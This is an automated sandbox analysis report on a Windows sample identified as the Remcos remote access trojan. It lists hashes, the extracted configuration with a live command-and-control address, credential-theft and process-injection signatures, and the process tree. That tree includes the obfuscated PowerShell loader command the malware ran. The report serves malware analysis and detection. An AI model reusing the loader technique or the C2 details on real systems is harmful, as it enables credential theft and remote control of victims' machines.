Analysis
-
max time kernel
147s -
max time network
147s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
20/08/2024, 17:13
Static task
static1
Behavioral task
behavioral1
Sample
b089218dc7ac4e96a6a9bf13dc51f88d082cc15596692af64724f508719e60a0.exe
Resource
win7-20240729-en
General
-
Target
b089218dc7ac4e96a6a9bf13dc51f88d082cc15596692af64724f508719e60a0.exe
-
Size
713KB
-
MD5
857be0d54f844d0b99341fcb38fd7c00
-
SHA1
a42bb0bbde545d4a94423175a1c9ed6feca461b0
-
SHA256
b089218dc7ac4e96a6a9bf13dc51f88d082cc15596692af64724f508719e60a0
-
SHA512
049615cb7171e40a59f5549fedf819ef45663b9beef0f77c69e97f00f2b607db4a05b8f25f380af1d9e04f642bee293b74752d41dcae08994cdd3d3fda920ce2
-
SSDEEP
12288:46qnCZGZwF0g7A8eYnPM0mERiFa/2XAUoChkXRkMQvfVDldLGSq4W82:OCcaD7A8pPmEU3XHJyXRcvdDNq4Wl
Malware Config
Extracted
remcos
RemoteHost
45.95.169.110:2404
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-4W8R37
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral1/memory/3020-32-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral1/memory/1784-37-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral1/memory/2164-33-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral1/memory/2164-33-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral1/memory/3020-32-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts wab.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 2944 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 592 powershell.exe 2944 wab.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 592 set thread context of 2944 592 powershell.exe 32 PID 2944 set thread context of 3020 2944 wab.exe 34 PID 2944 set thread context of 2164 2944 wab.exe 35 PID 2944 set thread context of 1784 2944 wab.exe 36 -
pid Process 592 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wab.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wab.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wab.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wab.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b089218dc7ac4e96a6a9bf13dc51f88d082cc15596692af64724f508719e60a0.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 592 powershell.exe 592 powershell.exe 592 powershell.exe 592 powershell.exe 592 powershell.exe 592 powershell.exe 592 powershell.exe 592 powershell.exe 3020 wab.exe 3020 wab.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 592 powershell.exe 2944 wab.exe 2944 wab.exe 2944 wab.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 592 powershell.exe Token: SeDebugPrivilege 1784 wab.exe -
Suspicious use of WriteProcessMemory 25 IoCs
description pid Process procid_target PID 1184 wrote to memory of 592 1184 b089218dc7ac4e96a6a9bf13dc51f88d082cc15596692af64724f508719e60a0.exe 29 PID 1184 wrote to memory of 592 1184 b089218dc7ac4e96a6a9bf13dc51f88d082cc15596692af64724f508719e60a0.exe 29 PID 1184 wrote to memory of 592 1184 b089218dc7ac4e96a6a9bf13dc51f88d082cc15596692af64724f508719e60a0.exe 29 PID 1184 wrote to memory of 592 1184 b089218dc7ac4e96a6a9bf13dc51f88d082cc15596692af64724f508719e60a0.exe 29 PID 592 wrote to memory of 2944 592 powershell.exe 32 PID 592 wrote to memory of 2944 592 powershell.exe 32 PID 592 wrote to memory of 2944 592 powershell.exe 32 PID 592 wrote to memory of 2944 592 powershell.exe 32 PID 592 wrote to memory of 2944 592 powershell.exe 32 PID 592 wrote to memory of 2944 592 powershell.exe 32 PID 2944 wrote to memory of 3020 2944 wab.exe 34 PID 2944 wrote to memory of 3020 2944 wab.exe 34 PID 2944 wrote to memory of 3020 2944 wab.exe 34 PID 2944 wrote to memory of 3020 2944 wab.exe 34 PID 2944 wrote to memory of 3020 2944 wab.exe 34 PID 2944 wrote to memory of 2164 2944 wab.exe 35 PID 2944 wrote to memory of 2164 2944 wab.exe 35 PID 2944 wrote to memory of 2164 2944 wab.exe 35 PID 2944 wrote to memory of 2164 2944 wab.exe 35 PID 2944 wrote to memory of 2164 2944 wab.exe 35 PID 2944 wrote to memory of 1784 2944 wab.exe 36 PID 2944 wrote to memory of 1784 2944 wab.exe 36 PID 2944 wrote to memory of 1784 2944 wab.exe 36 PID 2944 wrote to memory of 1784 2944 wab.exe 36 PID 2944 wrote to memory of 1784 2944 wab.exe 36
Processes
-
C:\Users\Admin\AppData\Local\Temp\b089218dc7ac4e96a6a9bf13dc51f88d082cc15596692af64724f508719e60a0.exe"C:\Users\Admin\AppData\Local\Temp\b089218dc7ac4e96a6a9bf13dc51f88d082cc15596692af64724f508719e60a0.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1184 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle minimized " $nephelite=Get-Content 'C:\Users\Admin\AppData\Local\Temp\belizerens\Anisosepalous\dagbrkninger\Stencilling.Ass243';$Kurrajong=$nephelite.SubString(56568,3);.$Kurrajong($nephelite)"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:592 -
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\actysgcnykoajsqmtna"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3020
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\lehrtznomsgftymqcyndcf"4⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:2164
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\nymctrgiaayjvfautjhffkoaa"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1784
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
Filesize
377KB
MD52c2dd8cd3a8e9d59a9329f41de07faf5
SHA15b43e2c03f458531b56d50404cf4a6095632f296
SHA256c04a936ca71dd30413ba86100ed0fa5a5ba5d73609e778a351314504137a9b15
SHA5125358a19aa964dc359efebe07a871ad58bdf85e15e784d55c57da7cb74590f9e7d5da5f126a0ab6fe1e28fcc2af297fa45f98b0d019544d0a8735a60868dcae25
-
Filesize
55KB
MD56d1f78dce389501cbce9c49abdb72308
SHA120d5e675fadb508978d1ca91d79f7bd96091a8ad
SHA25631600f74bde7637dca69ae3c61c5abfbe2aebf84760afdf8ad410574e6d3f49f
SHA512b3b7d9fae878e5a2302158a899b0620efbb63dbdb26ae3f26b2f4712192b348241126995f92fb6c11a7add82f83fd7f53971a93ba604e028205f108d2d80b431